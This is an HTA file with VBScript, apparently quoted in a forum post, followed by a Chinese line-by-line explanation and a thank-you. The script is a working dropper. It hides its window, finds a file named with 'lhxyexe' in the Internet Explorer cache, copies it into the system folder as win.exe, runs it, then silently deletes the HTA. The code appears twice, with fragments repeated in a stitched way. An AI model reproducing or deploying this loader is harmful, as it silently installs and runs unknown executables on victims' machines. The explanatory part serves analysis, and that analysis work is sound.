<HTA:APPLICATION caption="no" border="none" showintaskbar="no" >
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBScript">
on error resume next
window.moveTo 0,0
window.resizeTo 0,0
dim exepath
Function Search(objFolder)
Dim objSubFolder
For Each objFile in objFolder.Files
If InStr(1, objfile.name, "lhxyexe", vbtextcompare) then
set filecp = objg_fso.getfile(objfile.path)
filecp.copy (exepath)
exit for
End If
Next
For Each objSubFolder in objFolder.SubFolders
Search objSubFolder
Next
End Function
Set objg_fso = CreateObject("Scripting.FileSystemObject")
str=WSH.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache")
set tempfolder = objg_fso.getfolder(str)
set othisfolder = objg_fso.GetSpecialFolder(1)
exepath=othisfolder.path & "win.exe"
search tempfolder
wsh.run (exepath)
wsh.run "command.com /c del c:\win.hta" ,0
window.close()
</script>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBScript">
on error resume next
window.moveTo 0,0
window.resizeTo 0,0
dim exepath
Function Search(objFolder)
Dim objSubFolder
For Each objFile in objFolder.Files
If InStr(1, objfile.name, "lhxyexe", vbtextcompare) then
set filecp = objg_fso.getfile(objfile.path)
filecp.copy (exepath)
exit for
End If
Next
For Each objSubFolder in objFolder.SubFolders
Search objSubFolder
Next
End Function
Set objg_fso = CreateObject("Scripting.FileSystemObject")
str=WSH.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache")
set tempfolder = objg_fso.getfolder(str)
set othisfolder = objg_fso.GetSpecialFolder(1)
exepath=othisfolder.path & "win.exe"
search tempfolder
wsh.run (exepath)
wsh.run "command.com /c del c:\win.hta" ,0
window.close()
</script>
str=WSH.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache")
set tempfolder = objg_fso.getfolder(str)
是获得Windows保存IE临时文件的目录set othisfolder = objg_fso.GetSpecialFolder(1)
是获得系统目录
exepath=othisfolder.path & "win.exe"
是获得系统目录下面的win.exewsh.run (exepath)
是执行exepath文件上面的整个程序来看就是将IE临时文件中的一个名称带lhxyexe的文件覆盖win.exe并执行。
[email protected]多谢了